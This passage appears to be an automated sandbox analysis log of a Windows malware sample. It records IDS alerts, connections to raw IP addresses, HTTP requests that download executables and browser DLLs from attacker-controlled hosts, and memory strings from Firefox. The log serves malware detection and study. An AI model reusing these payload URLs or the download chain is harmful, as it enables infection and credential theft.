Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49940 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49931 -> 154.216.20.243:443

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11
Source: unknown	TCP traffic detected without corresponding DNS query: 31.41.244.11

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00FEE0C0 recv,recv,recv,recv,

0_2_00FEE0C0

Source: global traffic	HTTP traffic detected: GET /downloaded_file.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: woo097878781.winConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /64.EXE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0Host: woo097878781.win
Source: global traffic	HTTP traffic detected: GET /files/5131681669/4ZAAIhb.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache

Source: firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2876452576.0000019CFAB82000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/Drag and drop items here to keep them within reach but out of your toolbar& MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate\|date - profileAgeCreated\|date) / 3600000 <= 24)) && (version\|versionCompare('116.!') >= 0)(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueDeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/Drag and drop items here to keep them within reach but out of your toolbar& MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate\|date - profileAgeCreated\|date) / 3600000 <= 24)) && (version\|versionCompare('116.!') >= 0)(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueDeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: BETWEEN 'www.' \|\| :strippedURL AND 'www.' \|\| :strippedURL \|\| X'FFFF'https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/Drag and drop items here to keep them within reach but out of your toolbar& MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEYyj8zLJVJc//j1xARfPx+oE/xqqM7O7tEZ9+XMWBeEQCqbJZRV8YS8VVq7GffqygmqryEGBhGRP5MX05XlfMO0cKletwojy/g/uWNoFAMYM3K/5640rSS53JHtjagJJE(browserSettings.update.channel == "release") && (!((currentDate\|date - profileAgeCreated\|date) / 3600000 <= 24)) && (version\|versionCompare('116.!') >= 0)(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == true(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueFirefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:(currentDate\|date - profileAgeCreated) / 86400000 >= 28 && 'browser.newtabpage.activity-stream.feeds.section.topstories' \| preferenceValue == trueDeferredTask@resource://gre/modules/DeferredTask.sys.mjs:117:18 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://web-assets.toggl.com/app/assets/scripts/.js""://www.googleadservices.com/pagead/conversion_async.js"WEBEXT_BACKGROUND_PAGE_LOAD_MS_BY_ADDONIDdisabled_picture_in_picture_overrides.washingtonpost://vdb-cdn-files.s3.amazonaws.com//vidible-min.js"://pagead2.googlesyndication.com/tag/js/gpt.js"://pagead2.googlesyndication.com/pagead/js/adsbygoogle.jsdisabled_picture_in_picture_overrides.frontendMasters"://pagead2.googlesyndication.com/gpt/pubads_impl_.js"disabled_picture_in_picture_overrides.dailymotionWEBEXT_BACKGROUND_PAGE_LOAD_MS_BY_ADDONIDdisabled_picture_in_picture_overrides.radiocanadadisabled_picture_in_picture_overrides.frontendMasters://webcompat-addon-testbed.herokuapp.com/shims_test.js://track.adform.net/serving/scripts/trackpoint/async/://static.adsafeprotected.com/vans-adapter-google-ima.js://www.googleadservices.com/pagead/conversion_async.jsdisabled_picture_in_picture_overrides.yahoofinance://pagead2.googlesyndication.com/gpt/pubads_impl_.js://securepubads.g.doubleclick.net/tag/js/gpt.js://securepubads.g.doubleclick.net/gpt/pubads_impl_.js://media.richrelevance.com/rrserver/js/1.2/p13n.js://www.gstatic.com/firebasejs//firebase-messaging.jsdisabled_picture_in_picture_overrides.yahoofinance"://webcompat-addon-testbed.herokuapp.com/shims_test.js"disabled_picture_in_picture_overrides.radiocanadadisabled_picture_in_picture_overrides.washingtonpost"://track.adform.net/serving/scripts/trackpoint/""://track.adform.net/serving/scripts/trackpoint/async/""://static.adsafeprotected.com/vans-adapter-google-ima.js""://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"://id.rambler.ru/rambler-id-helper/auth_events.js://securepubads.g.doubleclick.net/gampad/ad-blk"://media.richrelevance.com/rrserver/js/1.2/p13n.js""://securepubads.g.doubleclick.net/gpt/pubads_impl_.js"://securepubads.g.doubleclick.net/gampad/xml_vmap1"://securepubads.g.doubleclick.net/tag/js/gpt.js""://www.gstatic.com/firebasejs//firebase-messaging.js"https://static.adsafeprotected.com/firefox-etp-pixel"://securepubads.g.doubleclick.net/gampad/ad-blk""://securepubads.g.doubleclick.net/gampad/xml_vmap1""://pubads.g.doubleclick.net/gampad/xml_vmap1""://securepubads.g.doubleclick.net/gampad/xml_vmap2""://id.rambler.ru/rambler-id-helper/auth_events.js""://pubads.g.doubleclick.net/gampad/xml_vmap2""://vdb-cdn-files.s3.amazonaws.com//vidible-min.js"://securepubads.g.doubleclick.net/gampad/xml_vmap2*"https://static.adsafeprotected.com/firefox-etp-pixel" equals www.rambler.ru (Rambler)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: "://www.facebook.com/platform/impression.php" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: (browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF966C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: (browserSettings.update.channel == "release") && ((experiment.slug in activeRollouts) \|\| ((!os.isMac) && (version\|versionCompare('111.!') >= 0)))https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://pubads.g.doubleclick.net/gampad/xml_vmap1"://www.googletagservices.com/tag/js/gpt.js""://s.webtrends.com/js/advancedLinkTracking.js"://pixel.advertising.com/firefox-etp://securepubads.g.doubleclick.net/gampad/ad://pubads.g.doubleclick.net/gampad/xml_vmap2"://static.adsafeprotected.com/iasPET.1.js"://ads.stickyadstv.com/auto-user-sync://track.adform.net/Serving/TrackPoint/://pubads.g.doubleclick.net/gampad/adhttps://ads.stickyadstv.com/firefox-etp"://cdn.optimizely.com/public/.js"://ads.stickyadstv.com/user-matching"://js.maxmind.com/js/apis/geoip2//geoip2.js""://.moatads.com//moatapi.js"://.adsafeprotected.com//imp/"://.moatads.com//moatheader.js"://.adsafeprotected.com//Serving/"://adservex.media.net/videoAds.js"://www.facebook.com/platform/impression.php*://.adsafeprotected.com/jload?webcompat@mozilla.org.412316860420://.adsafeprotected.com/jsvid?"://.vidible.tv//vidible-min.js""://s0.2mdn.net/instream/html5/ima3.js""://cdn.adsafeprotected.com/iasPET.1.js"://pubads.g.doubleclick.net/gampad/ad-blk://vast.adsafeprotected.com/vast://.adsafeprotected.com//unit/"://s.webtrends.com/js/webtrends.js""://imasdk.googleapis.com/js/sdkloader/ima3.js""://s.webtrends.com/js/webtrends.min.js""://.adsafeprotected.com//unit/""://securepubads.g.doubleclick.net/gampad/ad""https://ads.stickyadstv.com/firefox-etp""://pubads.g.doubleclick.net/gampad/ad-blk""://.adsafeprotected.com/jload""://.adsafeprotected.com//imp/""://.adsafeprotected.com/jsvid""://.adsafeprotected.com/.js""://.adsafeprotected.com/jload?"webcompat@mozilla.org.412316860420"://.adsafeprotected.com/.png""://ads.stickyadstv.com/auto-user-sync"://.adsafeprotected.com/services/pub"://track.adform.net/Serving/TrackPoint/""://pixel.advertising.com/firefox-etp""://ads.stickyadstv.com/user-matching""://.adsafeprotected.com//adj""://.adsafeprotected.com//Serving/""://.adsafeprotected.com/services/pub""://.adsafeprotected.com/tpl?""://vast.adsafeprotected.com/vast""://pubads.g.doubleclick.net/gampad/ad""://.adsafeprotected.com/.gif""://www.facebook.com/platform/impression.php""://.adsafeprotected.com/jsvid?*" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE517000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2910613755.0000019CFF0F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ://www.facebook.com/platform/impression.php equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Wikipedia"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.reddit.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="R"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/reddit-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Reddit<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Reddit"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" href="https://twitter.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="T"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/twitter-com@2x.png)"></div></div></div><div class="title"><span dir="auto">Twitter<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{"title":"Twitter"}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder hide-for-narrow"><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li></ul><div class="edit-topsites-wrapper"></div></div></section></div></div></div></div><style data-styles="[[null]]"></style></div><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div></div></div></div><style data-styles="[[null]]"></style></div></div></main></div></div> equals www.twitter.com (Twitter)
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000003.2838031242.0000019D05A6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2885909612.0000019CFCE75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2871367507.0000019CFA257000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000022.00000002.2902767464.0000019CFE62E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.2893740815.0000019CFD989000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 8www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000022.00000002.2870074343.0000019CF9679000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: DevToolsStartup.jsm:handleDebuggerFlagresource://devtools/server/devtools-server.jsNo callback set for this channel.get FIXUP_FLAGS_MAKE_ALTERNATE_URIFailed to listen. Callback argument missing.DevTools telemetry entry point failed: {9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}browser.fixup.domainsuffixwhitelist.get FIXUP_FLAG_FORCE_ALTERNATE_URIdevtools.debugger.remote-websocket@mozilla.org/dom/slow-script-debug;1Failed to execute WebChannel callback:devtools/client/framework/devtoolsJSON Viewer's onSave failed in startPersistenceWebChannel/this._originCheckCallback@mozilla.org/network/protocol;1?name=filebrowser.fixup.dns_first_for_single_wordsFailed to listen. Listener already attached.browser.urlbar.dnsResolveFullyQualifiedNamesresource://devtools/shared/security/socket.jsreleaseDistinctSystemPrincipalLoaderdevtools.performance.recording.ui-base-urldevtools/client/framework/devtools-browserdevtools.performance.popup.feature-flagextension/default-theme@mozilla.org/extendedDataresource://gre/modules/JSONFile.sys.mjshttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s@mozilla.org/uriloader/local-handler-app;1resource://gre/modules/JSONFile.sys.mjsisDownloadsImprovementsAlreadyMigratedhttp://www.inbox.lv/rfc2368/?value=%shandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/web-handler-app;1Scheme should be either http or httpsresource://gre/modules/DeferredTask.sys.mjshttp://poczta.interia.pl/mh/?mailto=%sresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/FileUtils.sys.mjshttps://mail.inbox.lv/compose?to=%sresource://gre/modules/URIFixup.sys.mjs{33d75835-722f-42c0-89cc-44f328e56a86}Can't invoke URIFixup in the content processgecko.handlerService.defaultHandlersVersion@mozilla.org/network/async-stream-copier;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}http://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/NetUtil.sys.mjsextractScheme/fixupChangedProtocol<http://compose.mail.yahoo.co.jp/ym/Compose?To=%s@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/FileUtils.sys.mjs@mozilla.org/network/file-input-stream;1_injectDefaultProtocolHandlersIfNeededhttps://mail.yahoo.co.jp/compose/?To=%s_finalizeInternal/this._finalizePromise<https://poczta.interia.pl/mh/?mailto=%s@mozilla.org/network/input-stream-pump;1First argument should be an nsIInputStreamNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1newChannel requires a single object argument@mozilla.org/scriptableinputstream;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLhttps://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%spdfjs.previousHandler.preferredActionhttps://poczta.interia.pl/mh/?mailto=%sMust have a source and a callback@mozilla.org/network/simple-stream-listener;1pdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALIDATE_DONT_COLLAPSE_WHITESPACE@mozilla.org/uriloader/handler-service;1https://mail.inbox.lv/compose?to=%sres
Source: firefox.exe, 00000022.00000002.2902284037.0000019CFE503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ["://track.adform.net/Serving/TrackPoint/", "://pixel.advertising.com/firefox-etp", "://.advertising.com/.js", "://.advertising.com/", "://securepubads.g.doubleclick.net/gampad/ad-blk", "://pubads.g.doubleclick.net/gampad/ad-blk", "://securepubads.g.doubleclick.net/gampad/xml_vmap1", "://pubads.g.doubleclick.net/gampad/xml_vmap1", "://vast.adsafeprotected.com/vast", "://securepubads.g.doubleclick.net/gampad/xml_vmap2", "://pubads.g.doubleclick.net/gampad/xml_vmap2", "://securepubads.g.doubleclick.net/gampad/ad", "://pubads.g.doubleclick.net/gampad/ad", "://www.facebook.com/platform/impression.php", "https://ads.stickyadstv.com/firefox-etp", "://ads.stickyadstv.com/auto-user-sync", "://ads.stickyadstv.com/user-matching", "https://static.adsafeprotected.com/firefox-etp-pixel", "://.adsafeprotected.com/.gif", "://.adsafeprotected.com/.png", "://.adsafeprotected.com/.js", "://.adsafeprotected.com//adj", "://.adsafeprotected.com//imp/", "://.adsafeprotected.com//Serving/", 